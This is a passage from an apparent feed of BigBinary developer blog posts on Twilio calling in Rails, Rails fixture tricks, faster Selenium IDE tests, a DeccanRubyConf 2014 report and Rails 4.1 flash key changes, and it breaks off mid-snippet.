  verified_number: &lt;%= ENV['TWILIO_VERIFIED_NUMBER'] %&gt;
  account_sid: &lt;%= ENV['TWILIO_ACCOUNT_SID'] %&gt;
  auth_token: &lt;%= ENV['TWILIO_AUTH_TOKEN'] %&gt;
  call_app_sid: &lt;%= ENV['TWILIO_CALL_APP_SID'] %&gt;</code></pre><h2>Step 2 - Generate capability token to be used by twilio-js</h2><p>After we have the config set up, we will proceed to create the capability token. 
This token will be generated using the Ruby gem and passed to the JavaScript SDK. The token helps the twilio-js client determine what permissions the application has, like making calls, accepting calls, sending SMS, etc.</p><p>We define a <code>TwilioTokenGeneratorService</code> for this purpose.</p><pre><code class="language-ruby">class TwilioTokenGeneratorService
  def process
    capability = twilio_capability
    capability.generate
  end

  private

  def twilio_capability
    capability = Twilio::Util::Capability.new Settings.twilio.account_sid, Settings.twilio.auth_token
    capability.allow_client_outgoing Settings.twilio.call_app_sid
    capability
  end
end</code></pre><p>As you can see, we first create a new <code>Twilio::Util::Capability</code> instance and pass credentials to it. We then call the <code>allow_client_outgoing</code> method and pass the application SID to it. This is the identifier for the TwiML application we have previously created on Twilio. Calling <code>allow_client_outgoing</code> gives the client permission to make outbound calls through Twilio. Finally, we call the <code>generate</code> method to create a token from the capability object.</p><h2>Step 3 - Define view elements and pass token to it</h2><p>The generated token will now be passed to the Twilio JS client for connecting with Twilio. In our app we define a <code>CallsController</code> and an <code>index</code> action in this controller. This action takes care of setting the capability token. Our index view consists of two buttons (to place and hang up a call), a number input field, a call log, and a data field to pass the capability token to the JavaScript bindings. We import the Twilio-JS library in the view. 
The CSS styling being used is from the <a href="https://static0.twilio.com/packages/quickstart/client.css">Twilio example</a>.</p><pre><code class="language-erb">&lt;div id=&quot;twilioToken&quot; data-token=&quot;&lt;%= @twilio_token %&gt;&quot;&gt;&lt;/div&gt;

&lt;button id=&quot;caller&quot; class=&quot;call&quot;&gt;Call&lt;/button&gt;
&lt;button id=&quot;hangup&quot; class=&quot;hangup&quot;&gt;Hangup&lt;/button&gt;
&lt;input type=&quot;text&quot; id=&quot;phoneNumber&quot; placeholder=&quot;Enter a phone number to call&quot;/&gt;

&lt;div id=&quot;log&quot;&gt;Loading pigeons...&lt;/div&gt;

&lt;script type=&quot;text/javascript&quot; src=&quot;//static.twilio.com/libs/twiliojs/1.2/twilio.min.js&quot;&gt;&lt;/script&gt;</code></pre><h2>Step 4 - Define coffeescript bindings to handle TwilioDevice connection to Twilio</h2><p>Next we set up CoffeeScript bindings to handle initialization of <code>TwilioDevice</code> and to use the entered number to place calls via Twilio. We take care of various events like <code>connect</code>, <code>disconnect</code>, <code>ready</code>, etc. on the <code>TwilioDevice</code> instance. More information about <code>TwilioDevice</code> usage can be found <a href="https://www.twilio.com/docs/client/twilio-js">here</a>.</p><pre><code class="language-coffeescript">class TwilioDevice
  constructor: -&gt;
    @initTwilioDeviceBindings()
    @initFormBindings()

  initTwilioDeviceBindings: -&gt;
    twilio_token = $('#twilioToken').data('token')
    twilio_device = Twilio.Device

    # Create the Client with a Capability Token
    twilio_device.setup(twilio_token, {debug: true})

    # Let us know when the client is ready.
    twilio_device.ready -&gt;
      $(&quot;#log&quot;).text(&quot;Ready&quot;)

    # Report any errors on the screen
    twilio_device.error (error) -&gt;
      $(&quot;#log&quot;).text(&quot;Error: &quot; + error.message)

    # Log a message when a call connects.
    twilio_device.connect (conn) -&gt;
      $(&quot;#log&quot;).text(&quot;Successfully established call&quot;)

    # Log a message when a call disconnects.
    twilio_device.disconnect (conn) -&gt;
      $(&quot;#log&quot;).text(&quot;Call ended&quot;)

  initFormBindings: -&gt;
    $('#caller').bind &quot;click&quot;, (event) -&gt;
      params = {&quot;phone_number&quot;: $('#phoneNumber').val()}
      Twilio.Device.connect(params)

    $('#hangup').bind &quot;click&quot;, (event) -&gt;
      Twilio.Device.disconnectAll()

$ -&gt;
  new TwilioDevice()</code></pre><p>If we now load this page, we should be able to see our app saying it's ready to take calls.</p><h2>Step 5 - Define TwiML Response Generator Service</h2><p>The final step before we place calls from our app is to handle callbacks from Twilio and return a <code>TwiML</code> response. For this we are going to define <code>TwilioCallTwiMLGeneratorService</code>, which takes care of generating this response. More information about how we need to define the response and individual fields can be found in <a href="https://www.twilio.com/docs/api/twiml/twilio_request">Twilio's docs</a>.</p><p>What we need to define is a response as below:</p><pre><code class="language-xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;Response&gt;
  &lt;Dial callerId=&quot;+15005550000&quot;&gt;
    &lt;Number&gt;+15005550001&lt;/Number&gt;
  &lt;/Dial&gt;
&lt;/Response&gt;</code></pre><p>We are making use of two elements here. <code>Dial</code> makes Twilio place a call using the defined <code>callerId</code> value as the number from which the call is made; this is the number displayed on the callee's phone. Note that this is the same verified number that we had specified before. 
Then we specify <code>Number</code>, which is the number to which we want to place the call. This number is passed first by the JavaScript client to Twilio, and then back to our application by Twilio, which we use to generate the response as above.</p><p>We define our <code>TwilioCallTwiMLGeneratorService</code> to take in a phone number as a parameter. It creates an instance of <code>Twilio::TwiML::Response</code>, and tapping on this instance we provide the <code>Dial</code> element with a <code>:callerId</code> value and the <code>Number</code> to place the call to. We validate the number before passing it back, and return an error if the number is invalid.</p><pre><code class="language-ruby">class TwilioCallTwiMLGeneratorService
  attr_reader :phone_number

  # Matches valid phone numbers acceptable to Twilio
  VALID_PHONE_NUMBER_REGEX = /^[\d\+\-\(\) ]+$/

  def initialize phone_number
    @phone_number = phone_number
  end

  def process
    Twilio::TwiML::Response.new do |r|
      if VALID_PHONE_NUMBER_REGEX.match(phone_number)
        # callerId is the number from which the call is made.
        r.Dial :callerId =&gt; Settings.twilio.verified_number do |d|
          d.Number(CGI::escapeHTML phone_number) # The number to call
        end
      else
        r.Error(&quot;Invalid number!&quot;)
      end
    end.text.strip
  end
end</code></pre><h2>Step 6 - Send TwiML response on Twilio callback</h2><p>We are now set to define Twilio's callback handler. This will be handled by the <code>create_call</code> action in <code>CallsController</code>. Twilio will send this endpoint a <code>POST</code> request along with some information specified <a href="https://www.twilio.com/docs/api/twiml/twilio_request">here</a>. We make use of the <code>phone_number</code> being passed to us by Twilio and pass it along to the <code>TwilioCallTwiMLGeneratorService</code>, which returns a valid <code>TwiML</code> response. 
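</p><p>The response itself is ordinary XML, so its shape can be sanity-checked without the twilio-ruby builder. Below is a rough sketch using REXML from the Ruby standard library; the two constants are hypothetical stand-ins for the config value and the callback parameter:</p>

```ruby
require 'rexml/document'

# Hypothetical stand-ins for Settings.twilio.verified_number and
# the phone_number posted back by Twilio.
CALLER_ID    = '+15005550000'
PHONE_NUMBER = '+15005550001'

# Same validation idea as in the service above.
VALID_PHONE_NUMBER_REGEX = /^[\d\+\-\(\) ]+$/

doc = REXML::Document.new
doc << REXML::XMLDecl.new('1.0', 'UTF-8')
response = doc.add_element('Response')

if VALID_PHONE_NUMBER_REGEX.match(PHONE_NUMBER)
  dial = response.add_element('Dial', 'callerId' => CALLER_ID)
  dial.add_element('Number').text = PHONE_NUMBER
else
  response.add_element('Error').text = 'Invalid number!'
end

twiml = ''
doc.write(twiml)
puts twiml
```

<p>This is only a sketch of the markup; in the app the twilio-ruby builder shown above does this work. 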
Since <code>TwiML</code> is a flavor of <code>XML</code>, we use <code>render xml</code> to return the response.</p><pre><code class="language-ruby">def create_call
  response_to_twilio_callback = TwilioCallTwiMLGeneratorService.new(call_params[:phone_number]).process
  render xml: response_to_twilio_callback
end

def call_params
  params.permit(:phone_number)
end</code></pre><p>As the <code>create_call</code> endpoint will be used by the Twilio API, we need to skip the authenticity token check for this action.</p><pre><code class="language-ruby">class CallsController &lt; ApplicationController
  skip_before_action :verify_authenticity_token, only: [:create_call]
end</code></pre><p>Finally, we need to specify the callback URL in our <code>TwiML</code> app on Twilio. For testing this locally, we can make use of a service like <a href="https://ngrok.com/">ngrok</a> to expose this endpoint.</p><p>Our service is now ready to place calls. The complete Rails application code that we have created can be found <a href="https://github.com/bigbinary/twilio-rails">here</a>.</p><p>Happy calling everyone!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Tricks and Tips for using Fixtures effectively in Rails]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/tricks-and-tips-for-using-fixtures-in-rails"/>
      <updated>2014-09-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/tricks-and-tips-for-using-fixtures-in-rails</id>
      <content type="html"><![CDATA[<p>Recently I gave a talk at <a href="http://rubykaigi.org/2014">RubyKaigi 2014</a> about Rails fixtures. In this blog post I will be discussing some tips and tricks for using fixtures effectively.</p><p>You can also see the video of this talk.&lt;iframe width=&quot;100%&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/AFDwI1oIgxk&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;</p><h2>Don't use ids... unless required</h2><p>In fixtures, we can specify the id of a fixture.</p><pre><code class="language-yaml">john:
  id: 1
  email: john@example.com</code></pre><p>I would recommend not specifying the id. Rails generates the id automatically if we don't explicitly specify it. Moreover, there are a few more advantages to not specifying the id.</p><h2>Stable ids for every fixture</h2><p>Rails will generate the id based on the key name. It will ensure that the id is unique for every fixture. It can also generate ids for uuid primary keys.</p><h2>Labeled references for associations like belongs_to, has_many</h2><p>Let's say we have a users table, and a user has many cars.</p><p>Car <code>ferrari</code> belongs to <code>john</code>. So we have mentioned <code>user_id</code> as 1.</p><pre><code class="language-yaml">ferrari:
  name: ferrari
  make: 2014
  user_id: 1</code></pre><p>When I'm looking at <code>cars.yml</code> I see <code>user_id</code> as 1, but now I have to look up which user has id 1.</p><p>Here is another implementation.</p><pre><code class="language-yaml">john:
  name: john
  email: john@example.com

ferrari:
  name: ferrari
  make: 2014
  user: john</code></pre><p>Notice that I no longer specify <code>user_id</code> for <code>ferrari</code>. I have mentioned a <code>name</code> for <code>john</code>. 
And now I can reference that name in <code>cars.yml</code> to mention that <code>ferrari</code> belongs to <code>john</code>.</p><h2>How to set a value to nil from a fixture</h2><p>Let's say that I have a boolean column which is <code>false</code> by default, but for an edge case I want it to be nil. I can obviously mutate the data generated by the fixture before testing. However, I can achieve this in fixtures also.</p><h2>Specify null to make the value nil</h2><pre><code class="language-ruby">require 'yaml'

YAML.load &quot;--- \n:private: null\n&quot;
=&gt; {:private=&gt;nil}</code></pre><p>As you can see above, if the value is <code>null</code> then YAML will treat it as <code>nil</code>.</p><pre><code class="language-yaml">john:
  name: john
  email: john@example.com
  private: null</code></pre><h2>Leave the value blank to make the value nil</h2><pre><code class="language-ruby">require 'yaml'

YAML.load &quot;--- \n:private: \n&quot;
=&gt; {:private=&gt;nil}</code></pre><p>As you can see above, if the value is blank then YAML will treat it as <code>nil</code>.</p><pre><code class="language-yaml">john:
  name: john
  email: john@example.com
  private:</code></pre><h2>When model name and table name do not match</h2><p>Generally in Rails, the model name and table name follow a strict convention: the <code>Post</code> model will have the table name <code>posts</code>. Using this convention, the fixture file for the <code>Post</code> model is obviously <code>fixtures/posts.yml</code>.</p><p>But sometimes models do not match directly with the table name. This could be because of legacy reasons or because of namespacing of models. In such cases automatic detection of fixture files becomes difficult.</p><p>Rails provides the <code>set_fixture_class</code> method for this purpose. 
This is a class method which accepts a hash where the key should be the name of the fixture or the relative path to the fixture file, and the value should be the model class.</p><p>I can use this method inside <code>test_helper.rb</code> in any class inheriting from <code>ActiveSupport::TestCase</code>.</p><pre><code class="language-ruby"># test_helper.rb
class ActiveSupport::TestCase
  # table name is &quot;morning_appts&quot;. It is being mapped to model &quot;MorningAppointment&quot;.
  self.set_fixture_class morning_appts: MorningAppointment

  # in this case the fixture is namespaced
  self.set_fixture_class '/legacy/users' =&gt; User

  # in this case the model is namespaced
  self.set_fixture_class outdoor_games: Legacy::OutdoorGame
end</code></pre><h2>Value interpolation using $LABEL</h2><p>Rails provides many ways to keep our fixtures DRY. Label interpolation is one of them. It allows the use of the key of a fixture as a value in the fixture. For example:</p><pre><code class="language-yaml">john:
  name: john
  email: john@example.com</code></pre><p>becomes:</p><pre><code class="language-yaml">john:
  name: $LABEL
  email: john@example.com</code></pre><p>$LABEL is not a global variable here. It's just a placeholder. $LABEL is replaced by the key of the fixture, and as discussed earlier, the key of the fixture in this case is <code>john</code>. So $LABEL has the value <code>john</code>.</p><p>Before <a href="https://github.com/rails/rails/pull/14399">this PR</a>, I could only use this feature if the value was exactly $LABEL. 
So if the email is <code>john@example.com</code> I could not use <code>$LABEL@example.com</code>. But after this PR, I can use $LABEL anywhere in the string, and Rails will replace it with the key.</p><p>So the earlier example becomes:</p><pre><code class="language-yaml">john:
  name: $LABEL
  email: $LABEL@example.com</code></pre><h2>YAML defaults</h2><p>I use YAML defaults in database.yml for drying it up and keeping common configuration in one place.</p><pre><code class="language-yaml">defaults: &amp;defaults
  adapter: postgresql
  encoding: utf8
  pool: 5
  host: localhost
  password:

development:
  &lt;&lt;: *defaults
  database: wheel_development

test:
  &lt;&lt;: *defaults
  database: wheel_test

production:
  &lt;&lt;: *defaults
  database: wheel_production</code></pre><p>I can use the same technique for drying up fixtures too, extracting the common part of our fixtures.</p><pre><code class="language-yaml">DEFAULTS: &amp;DEFAULTS
  company: BigBinary
  website: bigbinary.com
  blog: blog.bigbinary.com

john:
  &lt;&lt;: *DEFAULTS
  name: John Smith
  email: john@bigbinary.com

prathamesh:
  &lt;&lt;: *DEFAULTS
  name: Prathamesh Sonpatki
  email: prathamesh@bigbinary.com</code></pre><p>Note the usage of the key <code>DEFAULTS</code> for defining the default fixture. Rails will automatically ignore any fixture with the key <code>DEFAULTS</code>.</p><p>If we use any other key, then a record with that key will also get inserted in the database.</p><h2>Database specific tricks</h2><p>Fixtures bypass the normal Active Record object creation process. After being read from the YAML file, they are inserted into the database directly using an insert query, so they skip callbacks and validations. 
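</p><p>Incidentally, the <code>DEFAULTS</code> merge shown above is plain YAML merge-key behavior rather than Rails magic, and it can be checked in standalone Ruby. A quick sketch with the stdlib <code>yaml</code> library; <code>aliases: true</code> is needed on newer Psych versions, and the keys are just the illustrative ones from above:</p>

```ruby
require 'yaml'

yaml = <<~YML
  DEFAULTS: &DEFAULTS
    company: BigBinary
    website: bigbinary.com

  john:
    <<: *DEFAULTS
    name: John Smith
YML

# aliases: true lets newer Psych versions resolve &DEFAULTS / *DEFAULTS
fixtures = YAML.safe_load(yaml, aliases: true)
puts fixtures['john'] # john picks up company and website from DEFAULTS
```

<p>Coming back to the loading path: fixtures are written with a direct database insert, skipping callbacks and validations. 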
This also has an interesting side-effect which can be used for drying up fixtures.</p><p>Suppose we have a fixture with a timestamp:</p><pre><code class="language-yaml">john:
  name: John Smith
  email: john@example.com
  last_active_at: &lt;%= Time.now %&gt;</code></pre><p>If I am using PostgreSQL, I can replace the <code>last_active_at</code> value with <code>now</code>:</p><pre><code class="language-yaml">john:
  name: John Smith
  email: john@example.com
  last_active_at: now</code></pre><p><code>now</code> is not a keyword here. It is just a string. The actual query looks like this:</p><pre><code class="language-sql">INSERT INTO &quot;users&quot;(&quot;name&quot;, &quot;email&quot;, &quot;last_active_at&quot;, &quot;id&quot;)
VALUES('John Smith', 'john@example.com', 'now', 1144934)</code></pre><p>So the value for <code>last_active_at</code> is still just <code>now</code> when the query is executed.</p><p>The magic starts when PostgreSQL reads the values. <code>now</code> is a shorthand for the current timestamp. As soon as Postgres reads it, it replaces <code>now</code> with the current timestamp and the column <code>last_active_at</code> gets populated accordingly.</p><p>I can also use the <code>now()</code> function instead of just <code>now</code>.</p><p>This function is available in <a href="http://www.postgresql.org/docs/9.3/static/datatype-datetime.html#AEN5861">PostgreSQL</a> as well as <a href="http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html#function_now">MySQL</a>, so the usage of <code>now()</code> works in both of these databases.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Selenium IDE - Reducing time from 58 min to 15 min]]></title>
       <author><name>Prabhakar Battula</name></author>
      <link href="https://www.bigbinary.com/blog/how-i-reduced-selenium-test-run-time-from-58-minutes-to-15-minutes"/>
      <updated>2014-09-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-i-reduced-selenium-test-run-time-from-58-minutes-to-15-minutes</id>
      <content type="html"><![CDATA[<p>I wrote a bunch of Selenium tests using <a href="http://www.seleniumhq.org/download">Selenium IDE</a> for a project. The Selenium tests have proven to be very useful. However, the tests took around 58 minutes to complete a full run.</p><p>Here are the specific steps I took which brought the running time down to under 15 minutes.</p><h2>Set to run at the maximum speed</h2><table><tr><td>Command</td><td>Target</td><td>Value</td></tr><tr><td>setSpeed</td><td>0</td><td></td></tr></table><p>The <code>setSpeed</code> command takes the <code>Target</code> value in milliseconds. By setting the value to zero, I set the speed to maximum and the tests indeed ran fast. However, now I had lots of tests failing which were previously passing.</p><p>What happened?</p><p>In our tests a real Firefox browser is fired up and real elements are clicked. The application makes round trips to the Rails server hosted on Heroku.</p><p>By setting the Selenium tests to the maximum speed, the tests started asserting for elements on the page even before the pages were fully loaded by the browser.</p><p>I needed a set of instructions with which I could tell Selenium how long to wait before asserting for elements.</p><p>Selenium provides a wonderful suite of commands which helped me fine-tune the test run. 
Here I'm discussing some of those commands.</p><h2>waitForVisible</h2><p>This command tells Selenium to wait until the specified element is visible on the page.</p><p>In the case mentioned below, the Selenium IDE will wait until the element <code>css=#text-a</code> is visible on the page.</p><table><tr><td>Command</td><td>Target</td><td>Value</td></tr><tr><td>waitForVisible</td><td>css=#text-a</td><td></td></tr></table><h2>waitForText</h2><p>This command tells Selenium to wait until a particular text is visible in the specified element.</p><p>In the case mentioned below, the Selenium IDE will wait until the text <code>violet</code> is displayed in the element <code>css=#text-a</code>.</p><table><tr><td>Command</td><td>Target</td><td>Value</td></tr><tr><td>waitForText</td><td>css=#text-a</td><td>violet</td></tr></table><p>The difference between <em>waitForVisible</em> and <em>waitForText</em> is that <strong>waitForVisible waits until the specified element is visible on the page</strong> while <strong>waitForText waits until a particular text is visible in the specified element on the page</strong>.</p><h2>waitForElementPresent</h2><p>This command tells Selenium to wait until the specified element is present on the page.</p><p>In the case mentioned below, the Selenium IDE will wait until the element <code>css=a.button</code> is present on the page.</p><table><tr><td>Command</td><td>Target</td><td>Value</td></tr><tr><td>waitForElementPresent</td><td>css=a.button</td><td></td></tr></table><p><em>waitForVisible</em> and <em>waitForElementPresent</em> seem very similar. 
It seems both of these commands do the same thing. There is a subtle difference though.</p><p><em>waitForVisible</em> waits until the specified element is visible. Visibility of an element is manipulated by CSS properties; for example, using <code>display: none;</code> one can make an element not visible at all.</p><p>In contrast, the command <em>waitForElementPresent</em> waits until the specified element is present on the page in the form of HTML markup. This command does not give any consideration to CSS settings.</p><h2>refreshAndWait</h2><p>This command tells Selenium to refresh the page and wait until the targeted element is displayed on the page.</p><p>In the example mentioned below, the Selenium IDE will wait until the page is refreshed and the targeted element <code>css=span.button</code> is displayed on the page.</p><table><tr><td>Command</td><td>Target</td><td>Value</td></tr><tr><td>refreshAndWait</td><td>css=span.button</td><td></td></tr></table><h2>clickAndWait</h2><p>This command tells Selenium to click an element that submits the form and then wait for the page to reload. The subsequent commands are paused until the page is reloaded after the element is clicked.</p><p>In the case mentioned below, the Selenium IDE will wait until the page is reloaded after the specified element <code>css=input#edit</code> is clicked.</p><table><tr><td>Command</td><td>Target</td><td>Value</td></tr><tr><td>clickAndWait</td><td>css=input#edit</td><td></td></tr></table><p>The Selenium IDE commands used above and more are available in the <a href="http://docs.seleniumhq.org/docs/02_selenium_ide.jsp#selenium-commands-selenese">Selenium documentation</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[DeccanRubyConf 2014. Hou De!]]></title>
       <author><name>Santosh Wadghule</name></author>
      <link href="https://www.bigbinary.com/blog/deccanrubyconf"/>
      <updated>2014-08-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deccanrubyconf</id>
      <content type="html"><![CDATA[<p><img src="/blog_images/2014/deccanrubyconf/deccanrubyconflogo.png" alt="deccanrubyconflogo"></p><p>I attended, enjoyed, and took part as a volunteer in Pune's first RubyConf - <a href="http://www.deccanrubyconf.org/">DeccanRubyConf 2014</a>. True to its name, <strong><em>Hou De</em></strong> (let it be), the event went along in that easy spirit.</p><p>The day before the conference, in the morning, <a href="http://twitter.com/vipulnsward">Vipul</a> (one of the event organizers) and I picked up our guest speaker <a href="https://twitter.com/_ko1">Koichi Sasada</a> from the Pune airport. Koichi is a Ruby core member and works for <a href="https://www.heroku.com/">Heroku</a>. We welcomed him and went to the Hyatt Regency hotel where the event was taking place. Our guest checked into the hotel and then we decided to go for lunch at the Malaka Spice restaurant.</p><p>We reached there and Koichi told us that he wanted non-spicy food (safe food). We ordered non-spicy food, but it was still too spicy for Koichi. However, we enjoyed the food and had a very good discussion about Ruby internals, concurrency and parallelism, debugging in Ruby, Japanese culture, and Indian culture.</p><p><img src="/blog_images/2014/deccanrubyconf/koichi_vipul_santosh.jpg" alt="koichi &amp; vipul"></p><p>After lunch, we dropped Koichi off at the hotel and left for home.</p><p>The next morning was the event day. I woke up early and went to the venue. As part of the volunteering team, I and the other volunteers had tasks like handing out pens, badges, stickers, T-shirts, and coupons for the night party to the attendees.</p><p>Attendees had started to come in slowly. Some attendees asked me about T-shirt sizes; as I was wearing one of the conference T-shirts, they decided their T-shirt size from mine. 
It was a great experience meeting different kinds of people from around India.</p><p>The keynote by Koichi kicked the event off, and he talked about <strong><em>Ruby 2.1 features</em></strong> like:</p><ul><li>required keyword parameters,</li><li>rational number literals,</li><li><code>def</code> returning the symbol of the method name,</li><li>new runtime features (<code>String#scrub</code>, <code>Binding#local_variable_get</code>, etc.)</li></ul><p>Then he talked about <strong><em>performance improvements</em></strong>, <strong><em>Ruby 2.2</em></strong>, and how to <strong><em>speed up the Ruby interpreter</em></strong>. Click <a href="http://www.atdot.net/~ko1/activities/2014_deccanrubyconf_pub.pdf">here</a> for more details about his talk.</p><p><img src="/blog_images/2014/deccanrubyconf/koichi.jpg" alt="koichi"></p><p><img src="/blog_images/2014/deccanrubyconf/attendees.jpg" alt="attendees"></p><p>In between the talks, some new attendees came to the conference who had not registered for it. They told me that they thought it was Pune's regular local Ruby meetup. There were some misunderstandings, but they seemed interested in attending the event. I contacted <a href="https://twitter.com/gautamrege">Gautam</a>, as he was one of the organizers, and told him about the issue.</p><p>Attendees kept coming till the afternoon.</p><p>After Koichi's talk, two tracks opened up: one for talks and the other for workshops. A TDD workshop was conducted by <a href="https://twitter.com/ponnappa">Sidu Ponnappa</a>. I saw lots of attendees in this workshop and heard that it went very well.</p><p><img src="/blog_images/2014/deccanrubyconf/tddworkshop.jpg" alt="tddworkshop"></p><p>The next talk was <strong><em>Requiem for a dream</em></strong> by <a href="https://twitter.com/or9ob">Arnab Deka</a>. 
He talked about various tips and tricks, including using &quot;higher order functions and concurrency&quot; in Ruby and other programming languages like Clojure and Elixir.</p><p>After that, <a href="https://twitter.com/jainrishi15">Rishi Jain</a> talked about <strong><em>Game Development - The Ruby Way</em></strong>. He discussed how to build a game in Ruby using the <a href="http://www.libgosu.org/">Gosu</a> library. It was a very useful session for game developers. You can find out more about it <a href="https://speakerdeck.com/rishijain/game-development-the-ruby-way-dot">here</a>.</p><p>The next talk was <strong><em>Programming Ruby in Marathi</em></strong> by <a href="https://twitter.com/rtdp">Ratnadeep Deshmane</a> &amp; his friend <a href="https://twitter.com/aniketawati">Aniket Awati</a>. This was one of the best talks of the event. The way they used similar-sounding Marathi words for Ruby's keywords, along with their examples, made this talk remarkable. Their presentation style was nice too. Almost all attendees enjoyed this talk and laughed a lot.</p><p>After this talk there was a tea break for 15 minutes. The staff from the Hyatt hotel were very helpful. They were serving tea and coffee to the attendees and overall did a good job of ensuring the event cruised along smoothly. This is in sharp contrast to the service RubyConfIndia received from Lalit Resort.</p><p>After the tea break, I didn't get a chance to attend the other talks, as attendees were still coming in and I was assisting them. But I heard almost all the talks went very well.</p><p>In the meantime, while passing through the main passage, I saw the lightning talks board and decided to give a lightning talk on my Ruby gem. A lightning talk is a short presentation that you can give about your work.
You can also share your ideas and promote your library or any other project.</p><p>Then we all had our lunch. It was good, with lots of variety and dessert.</p><p>After lunch I went to the workshop <strong><em>Deliver projects 30% faster, know your CSS</em></strong> by <a href="https://twitter.com/aakashd">Aakash Dharmadhikari</a>. I wanted to attend it fully, but some of the attendees had difficulties with the internet connection, so I left the room to look into it.</p><p>The lightning talks were about to start, so I took some time to prepare my presentation.</p><p>In the lightning talks, the girls from Rails Girls Summer of Code talked about their project and their progress on it. After that, <a href="https://twitter.com/_cha1tanya">Prathamesh</a> talked about <a href="http://www.rubyindia.org/">RubyIndia.org</a> and asked people to subscribe to the newsletter. Then I gave a talk on my Ruby gem <strong><em>RubySimpleSearch</em></strong>; you can find more about it <a href="https://github.com/mechanicles/ruby_simple_search">here</a>. The next speaker, <a href="https://twitter.com/Rahul_Mahale">Rahul Mahale</a> from Nashik, asked people to help him grow the Ruby community in Nashik. All the other lightning talks went very well too.</p><p><img src="/blog_images/2014/deccanrubyconf/santosh.jpg" alt="santosh"></p><p>After the lightning talks, there was the closing keynote, <strong><em>On Solving Problems</em></strong>, by <a href="https://twitter.com/ghoseb">Baishampayan Ghose</a>. This talk made us think about how we write applications in our daily routine. He talked about architecture and explained that the future is a function of the past: <code>future = f(past)</code>. He also suggested that we should first understand the problem thoroughly and only then build the software. The talk was very informative and went very well.</p><p>After that, Gautam came on stage and thanked all the sponsors, organizers and volunteers.
He also mentioned that this event had a larger number of women attendees than he had ever seen at any other conference.</p><p>After the event, there was a party at the Irish Village hotel. My friends and I all went, and the party was superb.</p><p><img src="/blog_images/2014/deccanrubyconf/futsal.jpg" alt="futsal"></p><p>Thanks to all the <a href="http://www.deccanrubyconf.org/#sponsors">sponsors</a> and organizers who made this event fun and enjoyable.</p><p>You can check out more pictures of the conference <a href="https://www.flickr.com/photos/deccanrubyconf">here</a>.</p><p><em>Note: Photos are copyrighted by their respective owners.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Flash access changes in Rails 4.1]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/flash-access-changes-rails-4-1"/>
      <updated>2014-07-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/flash-access-changes-rails-4-1</id>
      <content type="html"><![CDATA[<p>Prior to upgrading to Rails 4.1 we had a helper to display flash messages and to add a css class to the message based on the flash type. Here is the code.</p><pre><code class="language-ruby">module FlashHelper
  ALERT_TYPES = [:success, :info, :warning, :danger]

  def bootstrap_flash
    flash_messages = []
    flash.each do |type, message|
      next if message.blank?
      type = :success if type == :notice
      type = :danger  if type == :alert
      type = :danger  if type == :error
      next unless ALERT_TYPES.include?(type)
      ....
      Array(message).each do |msg|
        text = content_tag(:div, msg.html_safe, :class =&gt; &quot;alert fade in alert-#{type} &quot;)
        flash_messages &lt;&lt; text if msg
      end
    end
    flash_messages.join(&quot;\n&quot;).html_safe
  end
end</code></pre><p>After upgrading to Rails 4.1, we started using the new <a href="http://guides.rubyonrails.org/upgrading_ruby_on_rails.html#cookies-serializer">Cookies serializer</a>. The following code was added to an initializer.</p><pre><code class="language-ruby">Rails.application.config.action_dispatch.cookies_serializer = :json</code></pre><p>Soon after this our flash helper started misbehaving and all flash messages disappeared from the application.</p><h2>JSON Cookies Serializer</h2><p>Before we move ahead, a word on the new JSON Cookies serializer. Applications created before Rails 4.1 use Marshal to serialize cookie values into the signed and encrypted cookie jars.</p><p>Commits like <a href="https://github.com/rails/rails/pull/13692">this</a> and <a href="https://github.com/rails/rails/pull/13945">this</a> made it possible to configure the Cookies serializer and changed the default from the Marshal serializer to a secure serializer using JSON.</p><p>The JSON serializer works on JSON objects. Thus objects like <code>Date</code> and <code>Time</code> will be stored as strings.
Hash keys will be stored as strings.</p><p>The JSON serializer makes the application much safer, since it is safer to pass around strings compared to passing around arbitrary values, which is what happens when values are marshalled.</p><p>Coming back to our problem, the change <a href="https://github.com/rails/rails/commit/a668beffd64106a1e1fedb71cc25eaaa11baf0c1">Stringify the incoming hash in FlashHash</a>, coupled with the above serialization changes, meant that even if we put a symbol as a key in the flash, we have to retrieve it as a &quot;string&quot;, since the keys are internally converted into strings.</p><p>The difference is clearly illustrated below.</p><pre><code class="language-ruby">flash[&quot;string&quot;] = &quot;a string&quot;
flash[:symbol] = &quot;a symbol&quot;

# Rails &lt; 4.1
flash.keys # =&gt; [&quot;string&quot;, :symbol]

# Rails &gt;= 4.1
flash.keys # =&gt; [&quot;string&quot;, &quot;symbol&quot;]</code></pre><h2>Solution</h2><p>Now that we know the root cause of the problem, the fix was simple: instead of relying on symbols, use &quot;strings&quot; to access values from the flash.</p><pre><code class="language-ruby">module BootstrapFlashHelper
  ALERT_TYPES = ['success', 'info', 'warning', 'danger']

  def bootstrap_flash
    flash_messages = []
    flash.each do |type, message|
      compare_type = type.to_s # Stringify the key so this works even with symbols.
      next if message.blank?
      compare_type = 'success' if compare_type == 'notice'
      compare_type = 'danger'  if compare_type == 'alert'
      compare_type = 'danger'  if compare_type == 'error'
      next unless ALERT_TYPES.include?(compare_type)
      Array(message).each do |msg|
        text = content_tag(:div, msg.html_safe, :class =&gt; &quot;alert fade in alert-#{compare_type} &quot;)
        flash_messages &lt;&lt; text if msg
      end
    end
    flash_messages.join(&quot;\n&quot;).html_safe
  end
end</code></pre>]]></content>
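The root cause (a JSON round trip turns symbol keys into string keys) can be demonstrated with nothing but the `json` stdlib. This is a simplified sketch of what the JSON cookies serializer does to the flash hash between requests, not Rails' actual code path.

```ruby
require 'json'

# A hash with a symbol key, as you might build a flash in a controller.
flash = { notice: "Saved!" }

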